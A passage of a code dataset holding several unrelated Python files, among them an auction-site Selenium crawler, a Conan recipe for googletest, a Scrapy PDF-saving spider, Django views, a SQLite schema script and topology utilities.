auction\r\n\tnavigate_to_auction_items_by_auction_id(driver,auction_id,auction_dictionary)\r\n\r\n\t#Get the number of result pages\r\n\ttotal_result_pages = get_total_pages (driver,wait5)\r\n\r\n\t#Scan all pages and pull auction info into new dictionary\r\n\tall_items_dict = {}\r\n\tfor i in range(2, total_result_pages+1):\r\n\t\tall_items_dict.update(get_all_items_on_page(driver,wait_halfsec))\r\n\t\tchange_page(driver,wait5,i)\r\n\r\n\t#Get final page\r\n\tall_items_dict.update(get_all_items_on_page(driver,wait_halfsec))\r\n\r\n\treturn all_items_dict\r\n\r\n#Finish building this function to loop through all auctions and get items.\r\ndef add_items_to_all_auctions(driver,wait5,wait_halfsec,auction_dictionary,connection):\r\n\t#Create a cursor for database entries\r\n\tcursor = connection.cursor()\r\n\r\n\t#Add auction details to database\r\n\tdatabase.add_auction_details_to_database(auction_dictionary,cursor)\r\n\tconnection.commit()\r\n\r\n\t#Debug\r\n\tcounter = 0\r\n\tfor key in auction_dictionary.keys():\r\n\t\t#Debug\r\n\t\tstart_time = time.time()\r\n\t\tcounter += 1\r\n\t\t\r\n\t\t#Get auction items by auction id\r\n\t\tauction_id_value = key\r\n\t\tall_items_for_auction = get_all_items_by_auction_id(driver,wait5,wait_halfsec,auction_id_value,auction_dictionary)\r\n\t\t\r\n\t\t#Add auction items to database\r\n\t\tdatabase.add_items_to_database(all_items_for_auction,auction_id_value,cursor)\r\n\t\tconnection.commit()\r\n\r\n\t\t#Debug\r\n\t\tprint(key)\r\n\t\tprint(\"--- %s seconds ---\" % (time.time() - start_time))\r\n\t\tprint(str((time.time() - start_time)/(len(all_items_for_auction))) + \" seconds per item with \" + str(len(all_items_for_auction)) + \" total items.\") \r\n\t\tprint(str(counter) + \" of \" + str(len(auction_dictionary.keys())))\r\n\r\n\t#Close the cursor\r\n\tcursor.close()\r\n\r\n\treturn None\r\n\r\ndef find_all_auctions_by_city(driver,wait5,city,state):\r\n\tauction_dictionary = {}\r\n\tfilter_auctions_by_warehouse_city(driver,wait5,bid_fta_all_auctions,city,state)\r\n\t#Get the number of result pages\r\n\ttotal_result_pages = get_total_pages (driver,wait5)\r\n\t#Scan all pages and pull auction info\r\n\tfor i in range(2, total_result_pages+1):\r\n\t\tauction_dictionary.update(get_all_auctions_on_page(driver,wait5))\r\n\t\tchange_page(driver,wait5,i)\r\n\t#Get final page\r\n\tauction_dictionary.update(get_all_auctions_on_page(driver,wait5))\r\n\r\n\treturn auction_dictionary\r\n\r\ndef setup_driver (headless,browser,implicitly_wait):\r\n\tif headless:\r\n\t\tdriver_options = Options()\r\n\t\tdriver_options.headless = True\r\n\t\tdriver = webdriver.Firefox(options=driver_options)\r\n\telse:\r\n\t\tdriver = webdriver.Firefox()\r\n\t\r\n\t#actions = ActionChains(driver)\r\n\t#Wait time when using explicit wait\r\n\twait5 = WebDriverWait(driver, 10)\r\n\twait_halfsec = WebDriverWait(driver, 1)\r\n\tdriver.implicitly_wait(implicitly_wait)\r\n\r\n\treturn driver,wait5,wait_halfsec","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":9267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"31552962","text":"from OWDTestToolkit.global_imports import *\n\nimport app ,\\\n debug ,\\\n element ,\\\n general ,\\\n home ,\\\n iframe ,\\\n network ,\\\n reporting ,\\\n statusbar ,\\\n test\n\n\nclass UTILS(app.main ,\n debug.main ,\n element.main ,\n general.main ,\n home.main ,\n iframe.main ,\n network.main ,\n reporting.main ,\n statusbar.main ,\n test.main):\n #\n # When you 
create your instance of this class, include the\n # \"self\" object so we can access the calling class' objects.\n #\n def __init__(self, p_parent):\n self.parent = p_parent\n self.device = p_parent.device\n self.data_layer = p_parent.data_layer\n self.apps = p_parent.apps\n self.marionette = p_parent.marionette\n self.actions = Actions(self.marionette)\n\n #\n # Globals used for reporting ...\n #\n self._resultArray = []\n self._commentArray = []\n self.errNum = 0\n self.passed = 0\n self.failed = 0\n self.start_time = time.time()\n self.last_timestamp = time.time()\n \n #\n # Other globals ...\n #\n self._DEFAULT_ELEMENT_TIMEOUT = 5\n\n #\n # Get run details from the OS.\n #\n self.testNum = self.get_os_variable(\"TEST_NAME\")\n self.testDesc = self.get_os_variable(\"TEST_DESC\")\n self.det_fnam = self.get_os_variable(\"DET_FILE\")\n self.sum_fnam = self.get_os_variable(\"SUM_FILE\")\n \n #\n # Default device to 'silent + vibrate'.\n #\n self.data_layer.set_setting(\"vibration.enabled\", True)\n self.data_layer.set_setting(\"audio.volume.notification\", 0)\n \n #\n # Default permissions.\n #\n self.apps.set_permission('Camera', 'geolocation', 'deny')\n\n \n #\n # Default timeout for element searches.\n #\n self.marionette.set_search_timeout(20)\n \n #\n # Set the current time to 'now'.\n #\n self.setTimeToNow()\n \n #\n # Unlock (if necessary).\n #\n self.parent.lockscreen.unlock()","sub_path":"OWDTestToolkit/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"292460069","text":"import os\nfrom conans import ConanFile, CMake, tools\n\n\nclass GoogletestConan(ConanFile):\n name = 'googletest'\n version = '1.8.1'\n url = 'https://github.com/wsbu/conan-packages'\n description = \"Google's C++ test framework.\"\n settings = 'os', 'compiler', 'build_type', 'arch'\n license = 'BSD 3-clause \"New\" or \"Revised\" License'\n options = {\n 'shared': [True, False],\n 'run_tests': [True, False]\n }\n default_options = 'shared=False', 'run_tests=False'\n generators = 'cmake'\n\n def source(self):\n self.run('git clone --depth=1 https://github.com/google/googletest.git -b release-' + self.version)\n\n def build(self):\n source_dir = os.path.join(self.build_folder, 'googletest')\n build_dir = os.path.join(self.build_folder, 'build')\n\n # Without this, CMake won't know how to find the dependencies that Conan is trying to inject\n # Also, set the `conan_output_dirs_setup()` macro to empty or else unit tests will fail\n tools.replace_in_file(os.path.join(source_dir, 'CMakeLists.txt'), 'project(googletest-distribution)',\n '''project(googletest-distribution)\ninclude(\"{0}/conanbuildinfo.cmake\")\nmacro(conan_output_dirs_setup)\nendmacro()\nconan_basic_setup()'''.format(self.build_folder))\n\n cmake = CMake(self)\n cmake.definitions['CMAKE_INSTALL_PREFIX'] = '/'\n\n if tools.cross_building(self.settings) or not self.options.run_tests:\n extra_definitions = {}\n else:\n extra_definitions = {\n 'gtest_build_tests': 'TRUE',\n 'gmock_build_tests': 'TRUE'\n }\n cmake.configure(source_dir=source_dir, build_dir=build_dir, defs=extra_definitions)\n cmake.build()\n if not tools.cross_building(self.settings) and self.options.run_tests:\n # Exclusion due to https://github.com/google/googletest/issues/845\n self.run('ctest --output-on-failure --exclude-regex gtest_catch_exceptions_test', cwd=self.build_folder)\n\n def package(self):\n build_dir = os.path.join(self.build_folder, 
'build')\n self.run('cmake --build {0} --target install -- DESTDIR={1}'.format(build_dir, self.package_folder))\n\n def package_info(self):\n self.cpp_info.rootpath = os.path.join(self.package_folder, 'usr')\n self.cpp_info.libdir = os.path.join(self.cpp_info.rootpath, 'lib')\n\n lib_suffix = 'd' if self.settings.build_type == 'Debug' else ''\n self.cpp_info.libs = [\n 'gtest' + lib_suffix,\n 'gtest_main' + lib_suffix,\n 'gmock' + lib_suffix,\n 'gmock_main' + lib_suffix\n ]\n","sub_path":"googletest/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"54057404","text":"import numpy as np\nimport unicodedata\n\ndef normalize_text(text):\n return unicodedata.normalize('NFD', text)\n\ndef build_vocabulary(documents, glove_vocabulary=None):\n words = {'<PAD>': {'count': 0, 'id': 0}, '<UNK>': {'count': 0, 'id': 1}}\n ids = ['<PAD>', '<UNK>']\n words_ignored = {}\n\n for document in documents:\n for word in document:\n if word not in words:\n if glove_vocabulary == None:\n words[word] = {'count': 0, 'id': len(words)}\n ids.append(word)\n else:\n if word in glove_vocabulary:\n words[word] = {'count': 0, 'id': len(words)}\n ids.append(word)\n if word in words:\n words[word]['count'] = words[word]['count'] + 1\n else:\n if word not in words_ignored:\n words_ignored[word] = 0\n words_ignored[word] += 1\n\n return {'words': words, 'ids': ids, 'words_ignored': words_ignored}\n\ndef words2ids(words, vocabulary, unknown='ignore'):\n #word not in vocabulary if\n #a. test set\n #b. word not in glove\n #unknown can be\n #'ignore'\n #'unknown_id'\n #'fail'\n if unknown == 'fail':\n return [vocabulary['words'][word]['id'] for word in words]\n elif unknown == 'unknown_id':\n return [vocabulary['words'][word]['id'] if word in vocabulary['words'] else vocabulary['words']['<UNK>']['id'] for word in words]\n else:\n return [vocabulary['words'][word]['id'] for word in words if word in vocabulary['words']]\n \ndef load_glove_vocabulary(opt):\n vocabulary = set()\n with open(opt['glove_file'], encoding=\"utf8\") as f:\n for line in f:\n elems = line.split()\n token = normalize_text(''.join(elems[0:-opt['glove_dim']]))\n vocabulary.add(token)\n return vocabulary\n\ndef build_embeddings(opt, vocabulary):\n vocabulary_size = len(vocabulary['words'])\n embeddings = np.random.uniform(-1, 1, (vocabulary_size, opt['glove_dim']))\n embeddings[0] = 0 # should be all 0 (using broadcast)\n\n with open(opt['glove_file'], encoding=\"utf8\") as f:\n for line in f:\n elems = line.split()\n token = normalize_text(''.join(elems[0:-opt['glove_dim']]))\n if token in vocabulary['words']:\n embeddings[vocabulary['words'][token]['id']] = [float(v) for v in elems[-opt['glove_dim']:]]\n return embeddings\n\n\n","sub_path":"Experiments/TextClassification/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"277292903","text":"#!/usr/bin/env python3\n'''\n@author: Winter Snowfall\n@version: 2.60\n@date: 27/01/2022\n\nWarning: Built for use with python 3.6+\n'''\n\nimport sqlite3\nimport logging\nimport argparse\nimport os\n\n##logging configuration block\nlog_file_full_path = os.path.join('..', 'logs', 'gog_create_db.log')\nlogger_file_handler = logging.FileHandler(log_file_full_path, mode='w', encoding='utf-8')\nlogger_format = '%(asctime)s %(levelname)s >>> 
%(message)s'\nlogger_file_handler.setFormatter(logging.Formatter(logger_format))\n#logging level for other modules\nlogging.basicConfig(format=logger_format, level=logging.ERROR) #DEBUG, INFO, WARNING, ERROR, CRITICAL\nlogger = logging.getLogger(__name__)\n#logging level for current logger\nlogger.setLevel(logging.INFO) #DEBUG, INFO, WARNING, ERROR, CRITICAL\nlogger.addHandler(logger_file_handler)\n\n##db configuration block\ndb_file_full_path = os.path.join('..', 'output_db', 'gog_visor.db')\n\n##CONSTANTS\nCREATE_GOG_FILES_QUERY = ('CREATE TABLE gog_files (gf_int_nr INTEGER PRIMARY KEY AUTOINCREMENT, '\n 'gf_int_added TEXT NOT NULL, '\n 'gf_int_removed TEXT, '\n 'gf_int_id INTEGER NOT NULL, '\n 'gf_int_download_type TEXT NOT NULL, '\n 'gf_id INTEGER NOT NULL, '\n 'gf_name TEXT NOT NULL, '\n 'gf_os TEXT, '\n 'gf_language TEXT, '\n 'gf_version TEXT, '\n 'gf_type TEXT, '\n 'gf_count INTEGER, '\n 'gf_total_size INTEGER NOT NULL, '\n 'gf_file_id TEXT NOT NULL, '\n 'gf_file_size INTEGER NOT NULL)')\n\nCREATE_GOG_PRICES_QUERY = ('CREATE TABLE gog_prices (gpr_int_nr INTEGER PRIMARY KEY AUTOINCREMENT, '\n 'gpr_int_added TEXT NOT NULL, '\n 'gpr_int_outdated TEXT, '\n 'gpr_int_id INTEGER NOT NULL, '\n 'gpr_int_title TEXT, '\n 'gpr_int_country_code TEXT NOT NULL, '\n 'gpr_currency TEXT NOT NULL, '\n 'gpr_base_price REAL NOT NULL, '\n 'gpr_final_price REAL NOT NULL)')\n\nCREATE_GOG_PRODUCTS_QUERY = ('CREATE TABLE gog_products (gp_int_nr INTEGER PRIMARY KEY AUTOINCREMENT, '\n 'gp_int_added TEXT NOT NULL, '\n 'gp_int_delisted TEXT, '\n 'gp_int_updated TEXT, '\n 'gp_int_json_payload TEXT NOT NULL, '\n 'gp_int_json_diff TEXT, '\n 'gp_int_v2_updated TEXT, '\n 'gp_int_v2_json_payload TEXT, '\n 'gp_int_v2_json_diff TEXT, '\n 'gp_int_is_movie INTEGER NOT NULL, '\n 'gp_v2_developer TEXT, '\n 'gp_v2_publisher TEXT, '\n 'gp_v2_tags TEXT, '\n 'gp_v2_series TEXT, '\n 'gp_v2_features TEXT, '\n 'gp_v2_is_using_dosbox INTEGER, '\n 'gp_id INTEGER UNIQUE NOT NULL, '\n 'gp_title TEXT, '\n 'gp_slug TEXT NOT NULL, '\n 'gp_cs_compat_windows INTEGER NOT NULL, '\n 'gp_cs_compat_osx INTEGER NOT NULL, '\n 'gp_cs_compat_linux INTEGER NOT NULL, '\n 'gp_languages TEXT, '\n 'gp_links_forum TEXT, '\n 'gp_links_product_card TEXT, '\n 'gp_links_support TEXT, '\n 'gp_in_development INTEGER NOT NULL, '\n 'gp_is_installable INTEGER NOT NULL, '\n 'gp_game_type TEXT NOT NULL, '\n 'gp_is_pre_order INTEGER NOT NULL, '\n 'gp_release_date TEXT, '\n 'gp_description_lead TEXT, '\n 'gp_description_full TEXT, '\n 'gp_description_cool TEXT, '\n 'gp_changelog TEXT)')\n\n##main thread start\n\n#added support for optional command-line parameter mode switching\nparser = argparse.ArgumentParser(description=('GOG DB create (part of gog_visor) - a script to create the sqlite DB structure '\n 'for the other gog_visor utilities.'))\n\nargs = parser.parse_args()\n\n#db file check/creation section\nif not os.path.exists(db_file_full_path):\n logger.info('No DB file detected. Creating new SQLite DB...')\n \n with sqlite3.connect(db_file_full_path) as db_connection:\n db_cursor = db_connection.cursor()\n db_cursor.execute(CREATE_GOG_FILES_QUERY)\n db_cursor.execute('CREATE INDEX gf_int_id_index ON gog_files (gf_int_id)')\n db_cursor.execute(CREATE_GOG_PRICES_QUERY)\n db_cursor.execute('CREATE INDEX gpr_int_id_index ON gog_prices (gpr_int_id)')\n db_cursor.execute(CREATE_GOG_PRODUCTS_QUERY)\n db_connection.commit()\n \n logger.info('DB created successfully.')\nelse:\n logger.error('Existing DB file detected. 
Please delete the existing file if you are attempting to recreate the DB!')\n\n##main thread end\n","sub_path":"scripts/gog_create_db.py","file_name":"gog_create_db.py","file_ext":"py","file_size_in_byte":5545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"543455139","text":"import os.path\nimport tempfile\nfrom urllib.parse import urlparse\n\nfrom scrapy.exceptions import CloseSpider, IgnoreRequest\nfrom scrapy.spidermiddlewares.httperror import HttpError\nfrom scrapy.utils.project import get_project_settings\nfrom twisted.internet.error import DNSLookupError\nfrom twisted.internet.error import TimeoutError\nimport scrapy\n\nfrom ..items import Article\n\n\nclass BaseSpider(scrapy.Spider):\n\n schemes = ['http', 'https', 'ftp', 'ftps']\n\n\n @staticmethod\n def jobdir(scraper_name):\n return os.path.join(\n # NB: tried to use get_project_settings()['FEED_TEMPDIR']\n # here, but it was inexplicably None. Anywhere in /tmp is\n # fine though.\n '/tmp',\n 'crawls',\n scraper_name\n )\n\n def __init__(self, *args, **kwargs):\n id = kwargs.get('uuid', '')\n self.uuid = id\n\n def on_error(self, failure):\n\n if failure.check(HttpError):\n response = failure.value.response\n self.logger.warning('HttpError (%s) on %s',\n response.url, response.status)\n\n elif failure.check(DNSLookupError):\n request = failure.request\n self.logger.warning('DNSLookupError on %s', request.url)\n\n elif failure.check(TimeoutError):\n request = failure.request\n self.logger.warning('TimeoutError on %s', request.url)\n\n # Catch the case where robots.txt files forbid a page\n elif failure.check(IgnoreRequest):\n request = failure.request\n self.logger.warning('Robots.txt forbidden on %s', request.url)\n\n else:\n self.logger.error(repr(failure))\n\n def _check_headers(self, response_headers,\n desired_extension=b'application/pdf'):\n content_type = response_headers.get('content-type', '').split(b';')[0]\n return desired_extension == content_type\n\n def _is_valid_pdf(self, response):\n \"\"\" Test if a response is a PDF\n\n We allow a pdf if it's file extension is not .pdf but\n its content-type is explicitly `application/pdf`\n\n Args:\n response: The request response\n extension: The type of extension to limit to\n mimetype: Either a **list|tuple** of or single mimetype\n to limit the URL to\n \"\"\"\n\n # Check the headers of the response\n is_pdf_type, is_octet_type = self._get_response_typing(response)\n\n if is_pdf_type:\n return True\n\n if is_octet_type:\n # If the response is an octet, make sure its a pdf\n # as this could result in trying to download images,\n # word docs, powerpoints, etc...\n url = response.urljoin(response.request.url)\n return self._is_valid_pdf_url(url)\n else:\n return False\n\n def _get_response_typing(self, response):\n \"\"\" Test if a response has valid content-type headers\n\n Args:\n response: HTTP request response\n \"\"\"\n response_headers = response.headers\n content_type = response_headers.get('content-type', '').split(b';')[0]\n\n is_pdf_type = b'application/pdf' == content_type\n is_octet_type = b'application/octet-stream' == content_type\n\n return (is_pdf_type, is_octet_type)\n\n def _is_valid_pdf_url(self, url):\n \"\"\" Check if a URL represents a valid URL path\n\n Args:\n url: The URL to test\n \"\"\"\n if url in ('', None,):\n return False\n\n try:\n scheme, netloc, path, params, query, fragment = urlparse(url)\n except ValueError: # For example invalid IPV6 URL or something\n return False\n\n if scheme != 
'' and scheme not in self.schemes:\n return False\n\n if not path.lower().endswith(\".pdf\"):\n return False\n\n return True\n\n def save_pdf(self, response, allow_octet=False):\n \"\"\" Save the response body to a temporary PDF file.\n\n If the response body is PDF-typed, save the PDF to a tempfile to parse\n it later. Else, just drop te item.\n\n The item will be later deleted in the pipeline.py file.\n\n Args:\n - response: The reponse object passed by scrapy\n\n Returns:\n - A scrapy Article item.\n \"\"\"\n\n data_dict = response.meta.get('data_dict', {})\n\n # Handle application/octet-stream in case some servers\n # don't provide a specific content-type in the response\n # as well as verify that path belongs to a PDF file.\n is_pdf = self._is_valid_pdf(response)\n\n if not is_pdf:\n self.logger.info('Not a PDF, aborting (%s)', response.url)\n return\n\n if not response.body:\n self.logger.warning(\n 'Empty filename or content, could not save the file.'\n ' [Url: %s]',\n response.request.url\n )\n return\n\n # Try and get filename from Content-Disposition\n disposition_name = None\n cd_header = response.headers.get(\"Content-Disposition\", None)\n if cd_header:\n cd_items = [x.split(b\"=\") for x in cd_header.split(b';')[1:] if b\"=\" in x]\n cd_items = dict((item[0].strip().lower(), item[1]) for item in cd_items if item[0] is not None)\n disposition_name = cd_items.get(b\"name\", None)\n if disposition_name is None:\n disposition_name = cd_items.get(b\"filename\", None)\n if disposition_name is None:\n disposition_name = cd_items.get(b'filename*', None)\n\n if disposition_name:\n disposition_name = disposition_name.decode('utf-8', 'ignore')\n\n max_article = self.settings.getint('MAX_ARTICLE')\n current_item_count = self.crawler.stats.get_value('item_scraped_count')\n if max_article > 0 and current_item_count:\n if current_item_count >= max_article:\n raise CloseSpider(\n 'Specified article count ({max_article}) raised'.format(\n max_article=max_article,\n )\n )\n\n # Download PDF file to /tmp\n with tempfile.NamedTemporaryFile(delete=False) as tf:\n tf.write(response.body)\n filename = tf.name\n\n # TODO: Get the filename from Content-Disposition header if available\n article = Article({\n 'title': data_dict.get('title', None),\n 'url': response.request.url,\n 'url_filename': response.request.url.split(\"/\")[-1],\n 'year': data_dict.get('year', None),\n 'authors': data_dict.get('authors', None),\n 'types': data_dict.get('types', None),\n 'subjects': data_dict.get('subjects', None),\n 'pdf': filename,\n 'page_title': data_dict.get('page_title', None),\n 'source_page': data_dict.get('source_page', None),\n 'link_title': data_dict.get('link_text', None),\n 'page_headings': data_dict.get('page_headings', None),\n 'disposition_title': disposition_name\n })\n\n return article\n","sub_path":"pipeline/reach-scraper/wsf_scraping/spiders/base_spider.py","file_name":"base_spider.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"138014432","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Project\nfrom .form import ProjectForm, RawProjectForm\n\n# Create your views here.\ndef home_view(request,*args,**kwargs):\n queryset = Project.objects.all()\n context = {\n 'object_list': queryset\n }\n return render(request, \"home.html\", context)\n\ndef about_view(request):\n form = ProjectForm(request.POST or None)\n if form.is_valid():\n form.save()\n form = 
ProjectForm()\n context = {\n 'form': form\n }\n return render(request, 'about.html', context)\ndef contact_view(request, *args, **kwargs):\n context = {}\n return render(request, \"contact.html\", context)\n\ndef project_detail_view(request):\n my_form = RawProjectForm()\n if request.method == \"POST\":\n my_form = RawProjectForm(request.POST)\n if my_form.is_valid():\n Project.objects.create(**my_form.cleaned_data)\n my_form = RawProjectForm()\n context = {\n 'form': my_form\n }\n return render(request, \"project/detail.html\",context)\n\n# def render_initial_data(request):\n# initial_data = {\n# \"title\": \"my awesome title\"\n# }\n# obj = Project.objects.get(id=1)\n# form = ProjectForm(request.POST or None, instance=obj)\n# if form.is_valid():\n# form.save()\n# form=ProjectForm\n# context = {\n# 'form': form\n# }\n#\n#\n# return render(request, \"project/render.html\", context)\n\ndef render_initial_data(request, id):\n # form = Project.objects.get(id=id)\n form = get_object_or_404(Project, id=id)\n\n\n control = {\n \"control\": form\n }\n return render(request, \"project/render.html\", control)\n\ndef project_delete(request, id):\n form = get_object_or_404(Project, id=id)\n if request.method == \"POST\":\n form.delete()\n return redirect(\"/\")\n context = {\n \"form\":form\n }\n\n return render(request, \"project/project_delete.html\", context)\n\ndef project_list(request):\n queryset = Project.objects.all()\n\n context = {\n \"object_list\":queryset\n }\n\n return render(request, \"project/project_list.html\", context)","sub_path":"project/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"623634719","text":"\"\"\"\nProgrammer: Chris Tralie (ctralie@alumni.princeton.edu)\nPurpose: To provide tools for quickly computing all pairs self-similarity\nand cross-similarity matrices, for doing \"greedy permutations,\" and for\nsome topological operations like adding cocycles and creating partitions of unity\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.misc\nimport scipy.sparse as sparse\n\n\"\"\"#########################################\n Self-Similarity And Cross-Similarity\n#########################################\"\"\"\n\ndef get_csm(X, Y):\n \"\"\"\n Return the Euclidean cross-similarity matrix between the M points\n in the Mxd matrix X and the N points in the Nxd matrix Y.\n \n Parameters\n ----------\n X : ndarray (M, d)\n A matrix holding the coordinates of M points\n Y : ndarray (N, d) \n A matrix holding the coordinates of N points\n Returns\n ------\n D : ndarray (M, N)\n An MxN Euclidean cross-similarity matrix\n \"\"\"\n C = np.sum(X**2, 1)[:, None] + np.sum(Y**2, 1)[None, :] - 2*X.dot(Y.T)\n C[C < 0] = 0\n return np.sqrt(C)\n\ndef get_csm_projarc(X, Y):\n \"\"\"\n Return the projective arc length cross-similarity between two point\n clouds specified as points on the sphere\n Parameters\n ----------\n X : ndarray (M, d)\n A matrix holding the coordinates of M points on RP^{d-1}\n Y : ndarray (N, d) \n A matrix holding the coordinates of N points on RP^{d-1}\n Returns\n ------\n D : ndarray (M, N)\n An MxN cross-similarity matrix\n \"\"\"\n D = np.abs(X.dot(Y.T))\n D[D < -1] = -1\n D[D > 1] = 1\n D = np.arccos(np.abs(D))\n return D\n\ndef get_ssm(X):\n return get_csm(X, X)\n\n\n\"\"\"#########################################\n Greedy Permutations\n#########################################\"\"\"\n\ndef get_greedy_perm_pc(X, 
M, verbose = False, csm_fn = get_csm):\n \"\"\"\n A Naive O(NM) algorithm to do furthest points sampling, assuming\n the input is a point cloud specified in Euclidean space. This saves \n computation over having compute the full distance matrix if the number\n of landmarks M << N\n \n Parameters\n ----------\n X : ndarray (N, d) \n An Nxd Euclidean point cloud\n M : integer\n Number of landmarks to compute\n verbose: boolean\n Whether to print progress\n csm_fn: function X, Y -> D\n Cross-similarity function (Euclidean by default)\n\n Return\n ------\n result: Dictionary\n {'Y': An Mxd array of landmarks, \n 'perm': An array of indices into X of the greedy permutation\n 'lambdas': Insertion radii of the landmarks\n 'D': An MxN array of distances from landmarks to points in X}\n \"\"\"\n # By default, takes the first point in the permutation to be the\n # first point in the point cloud, but could be random\n N = X.shape[0]\n perm = np.zeros(M, dtype=np.int64)\n lambdas = np.zeros(M)\n ds = csm_fn(X[0, :][None, :], X).flatten()\n D = np.zeros((M, N))\n D[0, :] = ds\n for i in range(1, M):\n idx = np.argmax(ds)\n perm[i] = idx\n lambdas[i] = ds[idx]\n thisds = csm_fn(X[idx, :][None, :], X).flatten()\n D[i, :] = thisds\n ds = np.minimum(ds, thisds)\n Y = X[perm, :]\n return {'Y':Y, 'perm':perm, 'lambdas':lambdas, 'D':D}\n\ndef get_greedy_perm_dm(D, M, verbose = False):\n \"\"\"\n A Naive O(NM) algorithm to do furthest points sampling, assuming\n the input is a N x N distance matrix\n \n Parameters\n ----------\n D : ndarray (N, N) \n An N x N distance matrix\n M : integer\n Number of landmarks to compute\n verbose: boolean\n Whether to print progress\n\n Return\n ------\n result: Dictionary\n {'perm': An array of indices into X of the greedy permutation\n 'lambdas': Insertion radii of the landmarks\n 'DLandmarks': An MxN array of distances from landmarks to points in the point cloud}\n \"\"\"\n # By default, takes the first point in the permutation to be the\n # first point in the point cloud, but could be random\n N = D.shape[0]\n perm = np.zeros(M, dtype=np.int64)\n lambdas = np.zeros(M)\n ds = D[0, :]\n for i in range(1, M):\n idx = np.argmax(ds)\n perm[i] = idx\n lambdas[i] = ds[idx]\n ds = np.minimum(ds, D[idx, :])\n DLandmarks = D[perm, :] \n return {'perm':perm, 'lambdas':lambdas, 'DLandmarks':DLandmarks}\n\n\n\n\"\"\"#########################################\n Cohomology Utility Functions\n#########################################\"\"\"\n\ndef add_cocycles(c1, c2, p = 2, real = False):\n S = {}\n c = np.concatenate((c1, c2), 0)\n for k in range(c.shape[0]):\n [i, j, v] = c[k, :]\n i, j = min(i, j), max(i, j)\n if not (i, j) in S:\n S[(i, j)] = v\n else:\n S[(i, j)] += v\n cret = np.zeros((len(S), 3))\n cret[:, 0:2] = np.array([s for s in S])\n cret[:, 2] = np.array([np.mod(S[s], p) for s in S])\n dtype = np.int64\n if real:\n dtype = np.float32\n cret = np.array(cret[cret[:, -1] > 0, :], dtype = dtype)\n return cret\n\ndef make_delta0(R):\n \"\"\"\n Return the delta0 coboundary matrix\n :param R: NEdges x 2 matrix specifying edges, where orientation\n is taken from the first column to the second column\n R specifies the \"natural orientation\" of the edges, with the\n understanding that the ranking will be specified later\n It is assumed that there is at least one edge incident\n on every vertex\n \"\"\"\n NVertices = int(np.max(R) + 1)\n NEdges = R.shape[0]\n \n #Two entries per edge\n I = np.zeros((NEdges, 2))\n I[:, 0] = np.arange(NEdges)\n I[:, 1] = np.arange(NEdges)\n I = 
I.flatten()\n    \n    J = R[:, 0:2].flatten()\n    \n    V = np.zeros((NEdges, 2))\n    V[:, 0] = -1\n    V[:, 1] = 1\n    V = V.flatten()\n    I = np.array(I, dtype=int)\n    J = np.array(J, dtype=int)\n    Delta = sparse.coo_matrix((V, (I, J)), shape=(NEdges, NVertices)).tocsr()\n    return Delta\n\ndef reindex_cocycles(cocycles, idx_land, N):\n    \"\"\"\n    Convert the indices of a set of cocycles to be relative\n    to a list of indices in a greedy permutation\n    Parameters\n    ----------\n    cocycles: list of list of ndarray\n        The cocycles\n    idx_land: ndarray(M, dtype=int)\n        Indices of the landmarks in the greedy permutation, with\n        respect to all points\n    N: int\n        Number of total points\n    \"\"\"\n    idx_map = -1*np.ones(N, dtype=int)\n    idx_map[idx_land] = np.arange(idx_land.size)\n    for ck in cocycles:\n        for c in ck:\n            c[:, 0:-1] = idx_map[c[:, 0:-1]]\n\n\n\"\"\"#########################################\n    Partition of Unity Functions\n#########################################\"\"\"\n\ndef partunity_linear(ds, r_cover):\n    \"\"\"\n    Parameters\n    ----------\n    ds: ndarray(n)\n        Some subset of distances between landmarks and \n        data points\n    r_cover: float\n        Covering radius\n    Returns\n    -------\n    varphi: ndarray(n)\n        The bump function\n    \"\"\"\n    return r_cover - ds\n\ndef partunity_quadratic(ds, r_cover):\n    \"\"\"\n    Parameters\n    ----------\n    ds: ndarray(n)\n        Some subset of distances between landmarks and \n        data points\n    r_cover: float\n        Covering radius\n    Returns\n    -------\n    varphi: ndarray(n)\n        The bump function\n    \"\"\"\n    return (r_cover - ds)**2\n\ndef partunity_exp(ds, r_cover):\n    \"\"\"\n    Parameters\n    ----------\n    ds: ndarray(n)\n        Some subset of distances between landmarks and \n        data points\n    r_cover: float\n        Covering radius\n    Returns\n    -------\n    varphi: ndarray(n)\n        The bump function\n    \"\"\"\n    return np.exp(r_cover**2/(ds**2-r_cover**2))\n\nPARTUNITY_FNS = {'linear':partunity_linear, 'quadratic':partunity_quadratic, 'exp':partunity_exp}\n","sub_path":"dreimac/geomtools.py","file_name":"geomtools.py","file_ext":"py","file_size_in_byte":7811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"334124143","text":"import zipfile\nimport json\nimport glob\nimport os\n\n\ndef save_json(filename, json_str):\n    with open(filename, \"w\") as f:\n        new_dict = json.loads(json_str)\n        json.dump(new_dict, f)\n    print(\"Finished writing the file...\")\n\n\ndef zip_files(files, zip_name):\n    files = glob.glob(files)\n    f = zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED)\n\n    for file in files:\n        f.write(file, os.path.basename(file))\n    f.close()\n\n    # files = ['.\\\\123.txt', '.\\\\3.txt']  # file locations; separate multiple files with commas\n    # zip_file = '.\\\\m66y.zip'  # name of the zip archive\n    # zip_files(files, zip_file)\n\n\nif __name__ == \"__main__\":\n    files = \"../../doc/Vectors/*\"\n    zip_files(files, 